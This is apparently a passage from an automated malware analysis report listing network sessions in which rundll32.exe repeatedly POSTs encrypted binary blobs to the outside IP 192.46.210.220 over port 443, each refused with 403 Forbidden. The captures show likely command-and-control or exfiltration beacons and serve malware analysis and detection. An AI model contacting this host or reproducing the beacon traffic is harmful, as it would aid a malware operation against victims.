                                                                                                          2021-10-28 03:08:35 UTC24OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:36 UTC29INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:36 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          50192.168.2.650006192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:07 UTC249OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:07 UTC249OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:08 UTC254INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:08 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          51192.168.2.650013192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:09 UTC254OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:09 UTC254OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:10 UTC259INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:10 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          52192.168.2.650025192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:11 UTC259OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:11 UTC259OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:12 UTC264INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:12 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          53192.168.2.650035192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:13 UTC264OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:13 UTC264OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:15 UTC269INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:15 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          54192.168.2.650045192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:15 UTC269OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:15 UTC269OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:16 UTC274INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:16 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          55192.168.2.650051192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:18 UTC274OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:18 UTC274OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:19 UTC279INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:19 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          56192.168.2.650053192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:19 UTC279OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:19 UTC279OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:19 UTC284INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:19 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          57192.168.2.650059192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:22 UTC284OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:22 UTC284OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:23 UTC294INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:23 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          58192.168.2.650061192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:23 UTC289OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:23 UTC289OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:23 UTC294INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:23 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          59192.168.2.650067192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:26 UTC294OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:26 UTC294OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:26 UTC299INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:26 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.649781192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:38 UTC29OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:38 UTC30OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:39 UTC39INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:39 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          60192.168.2.650069192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:27 UTC299OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:27 UTC299OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:27 UTC304INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:27 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          61192.168.2.650075192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:30 UTC304OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
